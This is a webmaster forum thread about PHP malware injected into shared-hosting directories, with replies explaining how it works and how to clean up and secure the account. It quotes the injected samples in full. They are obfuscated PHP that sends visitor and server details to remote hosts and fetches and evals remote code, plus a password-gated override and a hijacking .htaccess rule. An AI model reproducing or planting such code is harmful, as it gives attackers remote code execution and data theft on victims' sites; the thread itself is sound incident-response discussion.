Security issue! Site files got injected! Please help.

[owntype]

I didn't find a sub-forum section to post question regarding hosting/sites security so I have to post here.

I found every directories in my shared hosting accounts has the follwing 2 files:

1. random numbers.php, like 121521.php, it contains codes:

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? 
$_SERVER["HTTP_HOST"] : $HTTP_HOST); 
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : 
$SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? 
$_SERVER["REQUEST_URI"] : $REQUEST_URI); 
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? 
$_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); 
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : 
$REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? 
$_SERVER["HTTP_REFERER"] : $HTTP_REFERER); 
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."bdahbzzazbzgh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} 
else 
{include_once(base64_decode("aHR0cDovLw==")."bdahbzzazbzgh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}

2. .htaccess

Options -MultiViews
ErrorDocument 404 //rootdir/sales/0309/0309/121521.php

I have searched at google, found many threads regarding this issue. And those codes are injected via the opensource scripts like phpbb, wordpress and etc. After one site being injected, it can inject all sites under the same hosting server.

All the encoded codes refers to sites like phptags.ws that benefits from traffic of injected sites. So I have the following questions:

1. What's the aim of these codes?

2. Any direct attack to my sites and hosting accounts? e.g. the hacker knows all my login username/password and mysql info?

3. Should I delete all those files one by one? and what should I do before deleting them? (because they may be produced again)

4. Except for the .htaccess and numbers.php files, is there any other files have got injected?

Thanks!

 

[Kate]

Basically this code will try to include a remote file (obfuscated with the base64 function).
You can decode base64 strings: http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx
For example:
aHR0cDovLw==
bdahbzzazbzgh
LnVzZXJzLnBocGluY2x1ZGUucnU=

=> http://bdahbzzazbzgh.users.phpinclude.ru/
I don't know what is in the remote include file though. Most likely it's taking a note of your server URL and sending a recap E-mail to the hacker

You should definitely fix the .htaccess file and remove the PHP files as they could serve as a trojan to your system. That means the hacker could browse the files and directories on your system, extract passwords from config files etc
Most likely you have third party like wordpress that is vulnerable. Make sure you upgrade your apps to the latest version.
That's all I can say right now.

 

[owntype]

Thank you! SDSINC. Do you think such injections can have access to my Hosting/Ftp/MySQL account info? Please refer to the following thread. Thanks!

I found the following thread and all codes got annotated:
http://webmasterhotspot.com/index.php?showtopic=7792

<?

error_reporting(0); // Turns off error throwing

// Gathers tracking information

$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);

// encodes tracking information for usage in a URL

$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e)."
.".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);

// sets $f to 'phpsearch.cn'

$f=base64_decode("cGhwc2VhcmNoLmNu");

// I haven't been able to decode this MD5, but it replaces $f with
// any given URL when given an unknown password with this MD5 signature.

if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="face2bea501b7adcd7c09b627f443523")

$f=$_REQUEST["id"];

// It tries to use includes to call
// http://ads.phpsearch.cn/[tracking information]

if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));

// If the include didn't work,
// it tries to use file wrappers to call
// http://7.phpsearch.cn/[tracking information]

else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);

// If none of the the include and file wrappers work,
// it tries to use CURL to call
// http://71.phpsearch.cn/[tracking information]

else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};

// all these methods will execute the contents of the first successful request.
// currently, all this does is display a 404 page

?>

Also, saw from that thread, the hosing provider has processed a serverwide file deletion on those files. Hopefully my hosting service providers can do the same otherwise it would be a tough and boring process by manually removing.

 

[qbert220]

You have or had a vulnerability somewhere on your site. The attackers could have modified any file on your account. I would recommend deleting all files in your account. Do not take backups of what is already there since you may contaminate your own machine (you did keep your own backups didn't you?). Your MySQL databases may be safe, but if you can restore them from an old backup I would do so. If possible get your host to remove the entire account and recreate it. They should be willing to do that to protect their servers.

The attackers may have your MySQL password. Change this. It is unlikely that they have your FTP password, but it wouldn't hurt to change it.

Once you've done this, restore your site, installing the latest versions of any scripts you were using. Make sure that you do not have any world writable directories ("chmod 777" directories).

 

[owntype]

Thank you, gbert220!! Appreciate it!